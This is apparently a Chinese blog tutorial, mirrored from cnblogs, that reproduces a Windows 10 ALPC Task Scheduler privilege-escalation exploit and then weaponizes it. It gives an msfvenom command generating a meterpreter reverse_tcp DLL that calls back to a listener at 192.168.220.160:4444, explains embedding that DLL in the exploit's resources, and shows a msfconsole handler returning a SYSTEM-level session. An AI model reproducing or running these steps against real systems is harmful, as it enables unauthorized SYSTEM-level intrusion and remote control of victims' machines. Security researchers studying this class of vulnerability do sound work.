zoukankan      html  css  js  c++  java
  • Windows 10 提权漏洞复现及武器化利用

    项目地址:https://github.com/SandboxEscaper/randomrepo

    相关工具的下载地址:

    Process Explorer:https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer

    CFF Explorer:https://ntcore.com/?page_id=388

    复现:

    打开一个记事本和 Process Explorer

    记事本的 pid 号为 1944

    接下来利用漏洞

    上图的 1944 为记事本的 pid 号,回车

    spoolsv.exe 下多了个进程树

    这个进程树不会被 kill

    右键 -> Kill Process Tree

    当前进程为 System 进程

    武器化利用

    生成一个 dll 文件

    ┌─[root@sch01ar]─[~]
    └──╼ #msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.220.160 lport=4444 -f dll -o sch01ar.dll
    

    把生成的 dll 文件拿到 Windows 10 上

    用 CFF Explorer 打开原先的 ALPC-TaskSched-LPE.dll

    点 Resource Editor

    右键 Replace Resource

    然后选择 sch01ar.dll

    保存

    是否覆盖原文件,选择是

    开启 msf

    ┌─[root@sch01ar]─[~]
    └──╼ #msfconsole
    

    进行相关选项的配置,并开启监听

    切换回 Windows 10

    会弹出一个窗口

    msf 返回了会话

    msf exploit(handler) > sessions -i 1

    system 权限

  • 相关阅读:
    我们工作到底为了什么
    阿里云是如何做好高并发的
    织梦cms PHPcms 帝国cms比较
    正确修改MySQL最大连接数的三种好用方案
    微信开发的几个小功能
    命令行下运行php的方法和技巧
    PHP去除连续空格
    ajax,django
    web框架,HTTP协议
    Django 模型Model层2
  • 原文地址:https://www.cnblogs.com/sch01ar/p/9570400.html
Copyright © 2011-2022 走看看